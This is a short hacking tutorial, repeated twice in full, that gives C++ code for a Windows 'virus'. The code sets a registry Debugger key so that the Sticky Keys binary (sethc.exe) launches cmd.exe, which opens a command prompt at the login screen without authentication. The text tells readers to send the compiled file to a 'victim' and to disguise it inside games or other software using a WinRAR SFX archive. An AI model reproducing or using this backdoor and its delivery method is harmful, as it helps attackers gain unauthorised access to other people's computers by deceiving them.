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Today we are going to learn, how to build a c++ virus to hack windows.
Recently we published
how to build virus in c++.
Check that article before moving on to rest part of this article.
Let's discuss how this virus works,
This virus will install a backdoor in windows that will allow you to open command prompt at login screen and do anything you want without login into windows.
First you need to install any C++ compiler.
Now start compiler, and enter below code:--
void main()
system("REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /t REG_SZ /d \"C:\\windows\\system32\\cmd.exe\"");
Now compile above code and send exe file to victim. When he will open exe file, backdoor will get installed in windows.
Now press shift key 5 times on login screen and you will get command prompt which will allow you to do anything without login into windows.
You can pack your virus with other software or games using Winrar SFX archive.
Today we are going to learn, how to build a c++ virus to hack windows.
Recently we published
how to build virus in c++.
Check that article before moving on to rest part of this article.
Let's discuss how this virus works,
This virus will install a backdoor in windows that will allow you to open command prompt at login screen and do anything you want without login into windows.
First you need to install any C++ compiler.
Now start compiler, and enter below code:--
void main()
system("REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /t REG_SZ /d \"C:\\windows\\system32\\cmd.exe\"");
Now compile above code and send exe file to victim. When he will open exe file, backdoor will get installed in windows.
Now press shift key 5 times on login screen and you will get command prompt which will allow you to do anything without login into windows.
You can pack your virus with other software or games using Winrar SFX archive.
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